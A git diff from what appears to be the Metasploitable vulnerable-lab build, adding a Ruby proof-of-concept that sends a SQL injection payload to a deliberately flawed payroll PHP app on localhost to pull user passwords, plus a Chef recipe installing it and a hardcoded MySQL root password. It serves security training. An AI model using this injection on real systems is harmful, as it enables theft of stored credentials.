diff --git a/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php b/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
index ee8a8f7..7e05f68 100644
--- a/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
+++ b/chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
@@ -38,6 +38,7 @@ if($_POST['s']){
foreach ($keys as $key) {
echo "
" . $row[$key] . " | ";
}
+ echo "\n";
}
$result->free();
}
diff --git a/chef/cookbooks/metasploitable/files/payroll_app/poc.rb b/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
new file mode 100644
index 0000000..48452b6
--- /dev/null
+++ b/chef/cookbooks/metasploitable/files/payroll_app/poc.rb
@@ -0,0 +1,14 @@
+require 'net/http'
+
+url = "http://127.0.0.1/payroll_app.php"
+uri = URI(url)
+user = 'luke_skywalker'
+injection = "password'; select password from users where username='' OR ''='"
+
+puts "Making POST request to #{uri} with the following parameters:"
+puts "'user' = #{user}"
+puts "'password' = #{injection}"
+res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
+
+puts "Response body is #{res.body}"
+puts "Done"
diff --git a/chef/cookbooks/metasploitable/recipes/payroll_app.rb b/chef/cookbooks/metasploitable/recipes/payroll_app.rb
index 9e8f97a..94d8d2d 100644
--- a/chef/cookbooks/metasploitable/recipes/payroll_app.rb
+++ b/chef/cookbooks/metasploitable/recipes/payroll_app.rb
@@ -13,6 +13,17 @@ cookbook_file '/tmp/payroll.sql' do
mode '0755'
end
+directory '/home/vagrant/poc/payroll_app/' do
+ mode '0755'
+ owner 'vagrant'
+ recursive true
+end
+
+cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
+ source 'payroll_app/poc.rb'
+ mode '0755'
+end
+
bash 'create payroll database and import data' do
code <<-EOH
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"